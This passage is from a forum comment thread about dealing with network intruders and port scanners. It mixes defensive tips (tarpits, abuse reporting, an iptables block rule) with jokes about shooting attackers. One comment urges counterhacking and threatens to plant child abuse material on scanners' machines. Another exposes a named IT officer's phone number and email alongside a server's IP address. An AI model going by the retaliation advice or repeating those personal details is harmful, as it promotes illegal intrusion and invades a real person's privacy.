    Occasionally, I've attempted putting in the extra work and translated before sending. My half-assed method is to write the note (without the log entries), run it through one of the above translators, and then run the result through the translator back to English. If I can make sense of the final result, I send the original non-English translation. I've gotten some nice non-English thank-you notes this way.

    --
    Luke, help me take this mask off ... Just for once, let me butterfly kiss you with my own eyes.
  191. Simple Solution by T_O_M · · Score: 1

    1) Find them,
    2) Shoot them,
    3) Send the bill to the parents.

  192. Re:What intruders? - Good point! by JWSmythe · · Score: 1


    If you weren't just ignoring the fact that people were attempting, you could have already blocked them. And your logs shouldn't be kept on the same host.

    --
    Serious? Seriousness is well above my pay grade.
  193. Natives- Off Topic by Anonymous Coward · · Score: 0

    "If all humans were extremely cautious and thought hard about consequences and ethics, the US would not exist, and the natives would still be abundant."

    Except that we enslaved and killed the "natives". And then went and found more "natives" from other lands and did the same to them. I'm not too sure your point is valid.

  194. port 139 - bad idea by Anonymous Coward · · Score: 0

    Many windows machines, when trying to do a reverse dns lookup such as with netstat, will attempt to do a netbios lookup.

    While port 139 is used a lot by worms, do not block someone who is hitting that port. It could just be their firewall doing reverse name lookup.

  195. ban by Anonymous Coward · · Score: 0

    iptables -I INPUT -s domain name -j DROP

  196. Yes..send this email by Anonymous Coward · · Score: 0

    "...is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes."

    Yes. You can actually send an email to these attackers. I have provided a format below to help you out

    Dear [insertname]

    I am [insert_african_name] from Nigeria. Recently, my Government was overtaken by a ruthless dictator [insert_dictator_name]. This dictator has taken most of my money. With great difficulty, I managed to transfer 3,500,000 (THREE MILLION FIVE HUNDRED THOUSAND DOLLARS) to a safe keeping....

  197. Re:Somewhat offtopic, but how do people deal with by Anonymous Coward · · Score: 0

    And we'll "take care of you".

  198. We both suffer from the same malady... by Zanthor · · Score: 1

    We both have an uncontrolable desire to poke it with a stick.

    Now we KNOW there's places a stick shouldn't poke... but we have to poke the places we know won't hurt us.

    --

    Zanthor

  199. Intruders? by Anonymous Coward · · Score: 0

    Since the only way in is physical access, an alarmed, steel framed door, with a Schlage lockset, bundled with a Smith & Wesson .357 mag and a Browning 30-0-6 rifle, pretty much guarantee security.

  200. Use a STICKY honeypot or tarpit that reports by Guru2Newbie · · Score: 1
    A sticky honeypot (a.k.a tarpit) can greatly slow down the scanners instead of giving them something supposedly useful (they think) that a "regular" honeypot would do. There's a LaBrea page on Source Forge.

    I ran a tarpit under OpenBSD at a large university to protect our subnet. Hardly any department's subnet was protected--fair game to any outside crackers/scanners (or inside zombies). We put LaBrea tarpit on the first (x.x.x.1) address so all scanners got tripped up at our very first address, for hours or sometimes days at a time!

    Want to automatically report the offending IP addresses to their ISPs? Check out DShield and and their free FightBack program where they notify the ISPs--not you. See some FightBack results.

    There are scripts and clients to report the intrusion logs collected from dozens of IDSs, firewalls, routers and log utilities (e.g. Snort, Linksys routers, IPCHAINS, LaBrea). DShield has Linux and UNIX Client Scripts, as well as Windows Clients.

    If the script kiddie/scanners are automatically trying to break in, why not automate the abuse reporting, too? Even if the scanner is a cracked zombie, at least they could be notified--could lead to them securing their machine(s).

  201. Dealing with them by bobcote · · Score: 1

    For the most part if you ignore them they go away.
    If you make a big deal about it, the perps may feel you are worth attacking.

    If it seems really serious and you are a government contractor, contact the appropriate agency.

  202. Re:incorrect by Anonymous Coward · · Score: 0

    This gets used all the time but is an incorrect analogy. A house is private property.

    A correct analogy would be to go to the mall, then try opening the doors of the shops located at the mall.

    Portscanning by itself is only a _possible_ precursor (providing they are not performing a DoS) to illegal activity. Portscanning by itself is not a bad activity unless they are doing other "bad" activities such as spoofing addresses, etc in order to portscan a network that would not normally be regarded as public.

  203. counterhack... by mgoodman · · Score: 1

    and do it well, unlike the script kiddies bombarding your systems.

    then leave a note on their windoze desktop saying they've been pwned and to stop f'in around on other peoples servers or youll upload kiddie porn to their HD and send the secret service after you...and maybe you already did...

    --
    01100111 01100101 01110100 00100000 01101111 01110101 01110100 00100000 01101101 01101111 01110010 01100101 00101110
  204. Fake shell with fuck off message by Anonymous Coward · · Score: 0

    How about a fake shell which prints out a nice message telling them their attempt has been logged, and to kindly fuck off, and then disconnects?

  205. WON"T WORK by losycompresion · · Score: 2, Informative

    not that i'm an expert or anything. But when i've found others doing ill/breaking the law on the net and informed their ISP... The ISP is unwilling to do anything. Unless your the cops with a warrent they do nothing, and if you are the cops with one, all they will do is give you info on the person. The ISP won't do diddely. I Think they should just like you but they won't and don't.

  206. That's a Mitel Networks Managed Application Server by Animats · · Score: 1
    The IP address "67.42.142.160" is a server (mas-6000-server.swccnm.com) at the Southwest Counseling Center in Las Cruces, NM. It's in forward, but not reverse, DNS. Their "Chief IT officer" is Eugene Haley, 505-647-2876, "eughal@trailnet.com". Someone might want to tell him he has a problem. They've probably been rooted.

    A "MAS 6000" is a Mitel Networks 6000 Managed Applications Server, which is a prepackaged Red Hat Linux server, usually in a 1U rackmount unit. "The 6000 MAS is simple to use and requires little or no IT expertise to install and manage," says the vendor. It provides a "firewall", E-mail, and other standard server functions. It's a "network appliance". The installation instructions actually say to put it in a closet and disconnect the keyboard. It's supposed to be secure out of the box.

    There is at least one known FTP buffer overflow vulnerability for this system, but FTP must be enabled for it to work. Similarly, there's an SSH vulnerability, but SSH must be enabled for it to work.